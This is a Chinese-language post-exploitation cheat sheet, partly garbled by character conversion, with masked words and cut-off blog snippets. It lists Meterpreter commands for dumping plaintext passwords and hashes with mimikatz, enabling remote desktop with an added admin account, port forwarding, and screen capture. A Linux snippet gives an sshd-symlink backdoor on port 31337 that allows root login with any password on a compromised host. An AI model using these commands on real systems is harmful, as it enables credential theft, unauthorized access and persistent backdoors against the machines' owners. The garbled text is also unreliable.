sessions #sessions -h 檢視幫助
sessions -i
load mimikatz #載入mimikatz模組
kerberos #獲取明文密碼
tspkg #獲取明文密碼
wdigest #獲取密碼 跟kerberos相同
hashdump #獲取雜湊值
mimikatz_command -f samdump::hashes #獲取雜湊值
mimikatz_command -f sekurlsa::searchpasswprds #獲取明文密碼
run getgui -h #檢視幫助
run getgui -e #開啟遠端桌面
run getgui -u admin -p admin #新增使用者
run getgui -f 1314 -e #3389埠**為1314
run post/windows/manage/enable_rdp #開啟遠端桌面
run post/windows/manage/enable_rdp username=admin password=admin #新增使用者
run post/windows/manage/enable_rdp forward=true lport=1314 #將3389埠**到1314
ipconfig/ifconfig #檢視ip
netstat #檢視埠
route #檢視路由
getproxy #檢視**資訊
enumdesktops #檢視可用的桌面
getdesktop #獲取當前meterpreter 關聯的桌面
set_desktop #設定meterpreter關聯的桌面 -h檢視幫助
screenshot #截圖
use espia #或者使用espia模組截圖 然後輸入screengrab
run vnc #使用vnc遠端桌面連線
rdesktop #遠端桌面 rdesktop +ip需要在終端輸入
後滲透指令碼知識
許可權維持 許可權提公升 內網滲透等 內網滲透 資訊蒐集 讀取使用者hash 瀏覽器密碼 域滲透 獲取域控的控制權 meterpreter是metasploit框架中的乙個擴充套件模組,在攻擊成 功以後給我們返回乙個控制通道,是metsploit後滲透必不可少的 它具有強大的功能,包括socks 埠...
linux 後滲透測試
linux 常用shell 方法小結 入侵得到shell後,對方防火牆沒限制,想快速開放乙個可以訪問的ssh埠肉雞上執行 myles localhost ln sf usr sbin sshd tmp su tmp su oport 31337就會派生乙個31337埠,然後連線31337,用root...
滲透技巧之ssh
肉雞上執行 mickey vic ln sf usr sbin sshd tmp su tmp su oport 31337 就會派生乙個31337埠,然後連線31337,用root bin ftp mail當使用者名稱,密碼隨意,就可登陸。效果圖 在肉雞上執行 root localhost cd ...